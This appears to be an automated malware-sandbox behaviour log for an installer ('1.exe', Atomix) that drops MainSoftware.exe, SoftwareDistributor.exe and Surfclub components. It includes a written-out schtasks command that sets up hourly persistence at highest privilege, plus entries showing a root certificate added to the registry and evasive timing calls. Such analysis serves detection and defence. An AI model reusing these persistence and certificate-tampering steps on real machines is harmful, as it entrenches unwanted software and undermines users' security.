    Source: Binary string: /_/artifacts/obj/System.Diagnostics.Debug/Release/net8.0-windows/System.Diagnostics.Debug.pdb source: MainSoftware.exe, 00000009.00000002.2456750245.0000024A2CF90000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdb source: MainSoftware.exe, 00000009.00000002.2459714008.0000024A2D6D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459648718.0000024A2D6C2000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2487984945.0000021DEA262000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Memory.ni.pdb source: MainSoftware.exe, 00000009.00000002.2472309573.0000024A3051C000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472443393.0000024A30531000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: MainSoftware.exe, 00000009.00000002.2458284663.0000024A2D3F3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459614069.0000024A2D6B1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2487954749.0000021DEA251000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.Configuration.Abstractions/Release/net7.0/Microsoft.Extensions.Configuration.Abstractions.pdb source: MainSoftware.exe, 00000009.00000002.2455788652.0000024A2B160000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455841322.0000024A2B181000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483109037.0000021DE7F90000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/src/Serilog.Formatting.Compact/obj/Release/net8.0/Serilog.Formatting.Compact.pdb source: MainSoftware.exe, 00000009.00000002.2454007339.0000020995861000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453659363.0000020993F08000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdb source: MainSoftware.exe, 00000009.00000002.2459866027.0000024A2D713000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2471490361.0000024A30481000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2486428981.0000021DEA053000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488400492.0000021DEA2C1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdbSHA2560 source: MainSoftware.exe, 00000009.00000002.2458636879.0000024A2D552000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2499468698.0000021DED3A2000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdb source: MainSoftware.exe, 00000009.00000002.2456889306.0000024A2CFF9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456992556.0000024A2D041000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2485790532.0000021DE9E29000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: System.Security.Cryptography.ni.pdb source: MainSoftware.exe, 00000009.00000002.2457056110.0000024A2D096000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457231097.0000024A2D161000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2486216479.0000021DE9F91000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.AppContext/Release/net8.0-windows/System.AppContext.pdb source: MainSoftware.exe, 00000009.00000002.2459150036.0000024A2D5D5000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http.Json\Release\net8.0\System.Net.Http.Json.pdb source: MainSoftware.exe, 00000009.00000002.2458168635.0000024A2D3CA000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458251640.0000024A2D3E1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Runtime.InteropServices.ni.pdb source: MainSoftware.exe, 00000009.00000002.2458132025.0000024A2D3B1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458048833.0000024A2D395000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdbSHA256R source: MainSoftware.exe, 00000009.00000002.2453611805.0000020993ED3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453831581.00000209957C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2482080339.0000021DE7E51000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.Primitives/Release/net7.0/Microsoft.Extensions.Primitives.pdb source: MainSoftware.exe, 00000009.00000002.2453861770.00000209957F2000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2489752761.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000009.00000000.2402662552.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encodings.Web\Release\net8.0\System.Text.Encodings.Web.pdb source: MainSoftware.exe, 00000009.00000002.2458636879.0000024A2D55A000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458853975.0000024A2D571000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdb source: MainSoftware.exe, 00000009.00000002.2455864746.0000024A2B198000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455976436.0000024A2B241000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483529829.0000021DE8071000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: MainSoftware.exe, 00000009.00000002.2457909781.0000024A2D361000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457807688.0000024A2D349000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2473396348.000001DD50A71000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net8.0-windows\System.Net.Sockets.pdb source: MainSoftware.exe, 00000009.00000002.2459347730.0000024A2D621000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459431055.0000024A2D661000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Intrinsics\Release\net8.0\System.Runtime.Intrinsics.pdb source: MainSoftware.exe, 00000009.00000002.2458900009.0000024A2D594000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458980017.0000024A2D5A1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Http.ni.pdb source: MainSoftware.exe, 00000009.00000002.2455864746.0000024A2B198000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455976436.0000024A2B241000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483529829.0000021DE8071000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: MainSoftware.exe, 00000009.00000002.2453468583.0000020993E61000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453402629.0000020993E53000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Buffers/Release/net8.0-windows/System.Buffers.pdb source: MainSoftware.exe, 00000009.00000002.2459150036.0000024A2D5D9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2487355105.0000021DEA179000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: 1.exe, 00000000.00000003.1697942133.00000000099F0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdb source: MainSoftware.exe, 00000009.00000002.2458636879.0000024A2D552000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2499468698.0000021DED3A2000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: 1.exe, 00000000.00000003.1697942133.00000000099F0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: MainSoftware.exe, 00000009.00000002.2471636608.0000024A30491000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2471927266.0000024A304B1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488653015.0000021DEA2F1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdbSHA2560 source: MainSoftware.exe, 00000009.00000002.2459866027.0000024A2D713000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2471490361.0000024A30481000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2486428981.0000021DEA053000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488400492.0000021DEA2C1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Primitives.ni.pdb source: MainSoftware.exe, 00000009.00000002.2456147251.0000024A2B321000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456047128.0000024A2B2FB000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483635124.0000021DE812B000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483816012.0000021DE8151000.00000020.00000001.00040000.0000000A.sdmp
    Source: 1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: 1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: 1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: 1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: 1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
    Source: shi6FC2.tmp.0.dr Static PE information: 0xC7FEC470 [Wed Apr 29 05:06:56 2076 UTC]
    Source: C:\Users\user\Desktop\1.exe Code function: 0_2_008CCF30 SHGetFolderPathW,GetSystemDirectoryW,GetWindowsDirectoryW,GetWindowsDirectoryW,GetModuleFileNameW,SHGetSpecialFolderLocation,LoadLibraryW,GetProcAddress,GetEnvironmentVariableW,SHGetPathFromIDListW,SHGetMalloc,0_2_008CCF30
    Source: 1.exe Static PE information: section name: .didat
    Source: 1.exe Static PE information: section name: .fptable
    Source: ShortcutFlags.dll.0.dr Static PE information: section name: .fptable
    Source: MainSoftware.exe.0.dr Static PE information: section name: .CLR_UEF
    Source: MainSoftware.exe.0.dr Static PE information: section name: .didat
    Source: MainSoftware.exe.0.dr Static PE information: section name: Section
    Source: MainSoftware.exe.0.dr Static PE information: section name: _RDATA
    Source: SoftwareDistributor.exe.0.dr Static PE information: section name: .CLR_UEF
    Source: SoftwareDistributor.exe.0.dr Static PE information: section name: .didat
    Source: SoftwareDistributor.exe.0.dr Static PE information: section name: Section
    Source: SoftwareDistributor.exe.0.dr Static PE information: section name: _RDATA
    Source: MSI723B.tmp.0.dr Static PE information: section name: .fptable
    Source: MSI727B.tmp.0.dr Static PE information: section name: .fptable
    Source: shi6FC2.tmp.0.dr Static PE information: section name: .wpp_sf
    Source: shi6FC2.tmp.0.dr Static PE information: section name: .didat
    Source: MSI7050.tmp.0.dr Static PE information: section name: .fptable
    Source: MSI70ED.tmp.0.dr Static PE information: section name: .fptable
    Source: MSI713C.tmp.0.dr Static PE information: section name: .fptable
    Source: MSI716C.tmp.0.dr Static PE information: section name: .fptable
    Source: MSI719C.tmp.0.dr Static PE information: section name: .fptable
    Source: MSI71CC.tmp.0.dr Static PE information: section name: .fptable
    Source: MSI71FC.tmp.0.dr Static PE information: section name: .fptable
    Source: MSI7412.tmp.0.dr Static PE information: section name: .fptable
    Source: MSI7442.tmp.0.dr Static PE information: section name: .fptable
    Source: MSI7472.tmp.0.dr Static PE information: section name: .fptable
    Source: SoftwareDistributor.exe.1.dr Static PE information: section name: .CLR_UEF
    Source: SoftwareDistributor.exe.1.dr Static PE information: section name: .didat
    Source: SoftwareDistributor.exe.1.dr Static PE information: section name: Section
    Source: SoftwareDistributor.exe.1.dr Static PE information: section name: _RDATA
    Source: MainSoftware.exe.1.dr Static PE information: section name: .CLR_UEF
    Source: MainSoftware.exe.1.dr Static PE information: section name: .didat
    Source: MainSoftware.exe.1.dr Static PE information: section name: Section
    Source: MainSoftware.exe.1.dr Static PE information: section name: _RDATA
    Source: MSIBB04.tmp.1.dr Static PE information: section name: .fptable
    Source: MSIBBC0.tmp.1.dr Static PE information: section name: .fptable
    Source: MSIBC2F.tmp.1.dr Static PE information: section name: .fptable
    Source: MSIBC8D.tmp.1.dr Static PE information: section name: .didat
    Source: MSIBC8D.tmp.1.dr Static PE information: section name: .fptable
    Source: MSID78A.tmp.1.dr Static PE information: section name: .fptable
    Source: MSID7F8.tmp.1.dr Static PE information: section name: .fptable
    Source: MSID857.tmp.1.dr Static PE information: section name: .fptable
    Source: MSIE45E.tmp.1.dr Static PE information: section name: .fptable
    Source: shiB789.tmp.4.dr Static PE information: section name: .wpp_sf
    Source: shiB789.tmp.4.dr Static PE information: section name: .didat
    Source: Install.exe.part.8.dr Static PE information: section name: .CLR_UEF
    Source: Install.exe.part.8.dr Static PE information: section name: .didat
    Source: Install.exe.part.8.dr Static PE information: section name: Section
    Source: Install.exe.part.8.dr Static PE information: section name: _RDATA
    Source: Install.exe.14.dr Static PE information: section name: .managed
    Source: Install.exe.14.dr Static PE information: section name: hydrated
    Source: 289930.ocx.19.dr Static PE information: section name: .fptable
    Source: Surfclub.exe.25.dr Static PE information: section name: .CLR_UEF
    Source: Surfclub.exe.25.dr Static PE information: section name: .didat
    Source: Surfclub.exe.25.dr Static PE information: section name: Section
    Source: Surfclub.exe.25.dr Static PE information: section name: _RDATA
    Source: C:\Users\user\Desktop\1.exe Code function: 0_3_05656235 push es; ret 0_3_05656238
    Source: C:\Users\user\Desktop\1.exe Code function: 0_3_05656239 push es; iretd 0_3_05656254
    Source: C:\Users\user\Desktop\1.exe Code function: 0_3_056562E5 push es; ret 0_3_056562E8
    Source: C:\Users\user\Desktop\1.exe Code function: 0_3_055C2309 push esi; ret 0_3_055C230A
    Source: C:\Users\user\Desktop\1.exe Code function: 0_3_055C4A0A pushad ; iretd 0_3_055C4A35
    Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIBC2F.tmp
    Source: C:\Windows\System32\curl.exe File created: C:\Users\user\AppData\Local\Temp\289930.ocx
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\MSI719C.tmp
    Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSID78A.tmp
    Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Program Files (x86)\Atomix\Addons\Surfclub\Install.exe (copy)
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\shi6FC2.tmp
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\MSI70ED.tmp
    Source: C:\Program Files (x86)\Main\MainSoftware.exe File created: C:\Program Files (x86)\Main\Chop\Install.exe
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\ProgramFilesFolder\Main\MainSoftware.exe
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\MSI7472.tmp
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\MSI7442.tmp
    Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_5480\ShortcutFlags.dll
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\MSI716C.tmp
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\MSI713C.tmp
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Addons\SoftwareDistributor.exe
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\MSI71CC.tmp
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\MSI723B.tmp
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\MSI71FC.tmp
    Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSID857.tmp
    Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIBC8D.tmp
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\MSI7412.tmp
    Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\Main\MainSoftware.exe
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\shiB789.tmp
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_5480\lzmaextractor.dll
    Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Program Files (x86)\Atomix\Addons\Surfclub\Install.exe.part
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\MSI7050.tmp
    Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIBBC0.tmp
    Source: C:\Program Files\Surfclub\Install.exe File created: C:\Program Files\Surfclub\Surfclub.exe
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Local\Temp\MSI727B.tmp
    Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIE45E.tmp
    Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIBB04.tmp
    Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSID7F8.tmp
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Addons\Surfclub\How to uninstall.txt
    Source: C:\Users\user\Desktop\1.exe File created: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\How to uninstall.txt
    Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\Atomix\Addons\Surfclub\How to uninstall.txt
    Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\Atomix\How to uninstall.txt

    Boot Survival

    Source: C:\Program Files (x86)\Main\MainSoftware.exe Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /create /sc hourly /tn "MyPersistentApp_Hourly" /tr "\"C:\Program Files (x86)\Main\MainSoftware.exe\" Loop" /ru "user-PC\user" /RL HIGHEST /f
    Source: C:\Users\user\Desktop\1.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\743AF0529BD032A0F44A83CDD4BAA97B7C2EC49A Blob
    Source: C:\Users\user\Desktop\1.exe Process information set: NOOPENFILEERRORBOX (3 identical entries)
    Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX (19 identical entries)
    Source: C:\Windows\System32\msiexec.exe Process information set: NOGPFAULTERRORBOX (2 identical entries)
    Source: C:\Windows\System32\schtasks.exe Process information set: NOGPFAULTERRORBOX (12 identical entries)
    Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX (3 identical entries)
    Source: C:\Program Files (x86)\Main\MainSoftware.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Main\MainSoftware.exe Memory allocated: 20993E10000 memory reserve | memory write watch
    Source: C:\Program Files (x86)\Main\MainSoftware.exe Memory allocated: 1DD50A70000 memory reserve | memory write watch
    Source: C:\Program Files (x86)\Main\Chop\Install.exe Memory allocated: 2842AB00000 memory reserve | memory write watch
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe Memory allocated: 1E6D6FD0000 memory reserve | memory write watch
    Source: C:\Program Files\Surfclub\Install.exe Memory allocated: 164A27D0000 memory reserve | memory write watch
    Source: C:\Program Files\Surfclub\Surfclub.exe Memory allocated: 270B5F30000 memory reserve | memory write watch
    Source: C:\Program Files\Surfclub\Surfclub.exe Memory allocated: 25711F10000 memory reserve | memory write watch
    Source: C:\Program Files (x86)\Main\MainSoftware.exe Thread delayed: delay time: 922337203685477
    Source: C:\Program Files (x86)\Main\MainSoftware.exe Thread delayed: delay time: 922337203685477
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe Thread delayed: delay time: 922337203685477
    Source: C:\Program Files\Surfclub\Install.exe Thread delayed: delay time: 922337203685477
    Source: C:\Program Files\Surfclub\Surfclub.exe Thread delayed: delay time: 922337203685477
    Source: C:\Program Files (x86)\Main\MainSoftware.exe Window / User API: threadDelayed 420
    Source: C:\Program Files (x86)\Main\MainSoftware.exe Window / User API: threadDelayed 3697
    Source: C:\Program Files\Surfclub\Install.exe Window / User API: threadDelayed 671
    Source: C:\Program Files\Surfclub\Surfclub.exe Window / User API: threadDelayed 383
    Source: C:\Program Files\Surfclub\Surfclub.exe Window / User API: threadDelayed 582
    Source: C:\Program Files\Surfclub\Surfclub.exe Window / User API: threadDelayed 1140
    Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIBC2F.tmp
    Source: C:\Windows\System32\curl.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\289930.ocx
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI719C.tmp
    Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSID78A.tmp
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi6FC2.tmp
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI70ED.tmp
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7472.tmp
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7442.tmp
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_5480\ShortcutFlags.dll
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI716C.tmp
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI713C.tmp
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI71CC.tmp
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI723B.tmp
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI71FC.tmp
    Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSID857.tmp
    Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIBC8D.tmp
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7412.tmp
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shiB789.tmp
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_5480\lzmaextractor.dll
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI7050.tmp
    Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIBBC0.tmp
    Source: C:\Users\user\Desktop\1.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI727B.tmp
    Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIE45E.tmp
    Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSID7F8.tmp
    Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIBB04.tmp
    Source: C:\Program Files (x86)\Main\Chop\Install.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
    Source: C:\Users\user\Desktop\1.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
    Source: C:\Users\user\Desktop\1.exe API coverage: 7.8 %
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 5956 Thread sleep count: 204 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 5956 Thread sleep count: 98 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 3264 Thread sleep count: 59 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 648 Thread sleep count: 420 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 6128 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 2992 Thread sleep count: 96 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 2992 Thread sleep count: 226 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 2992 Thread sleep count: 62 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 5272 Thread sleep count: 130 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 3568 Thread sleep count: 3697 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 3140 Thread sleep count: 31 > 30
    Source: C:\Program Files (x86)\Main\MainSoftware.exe TID: 3368 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe TID: 4264 Thread sleep count: 187 > 30
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe TID: 1396 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Program Files\Surfclub\Install.exe TID: 2336 Thread sleep count: 244 > 30
    Source: C:\Program Files\Surfclub\Install.exe TID: 2336 Thread sleep count: 176 > 30
    Source: C:\Program Files\Surfclub\Install.exe TID: 2336 Thread sleep count: 671 > 30
    Source: C:\Program Files\Surfclub\Install.exe TID: 4500 Thread sleep count: 171 > 30
    Source: C:\Program Files\Surfclub\Install.exe TID: 908 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6536 Thread sleep count: 255 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6536 Thread sleep count: 87 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6400 Thread sleep count: 78 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6592 Thread sleep count: 175 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6592 Thread sleep count: 31 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6676 Thread sleep count: 336 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6676 Thread sleep count: 98 > 30
    Source: C:\Program Files\Surfclub\Surfclub.exe TID: 6512 Thread sleep count: 45 > 30
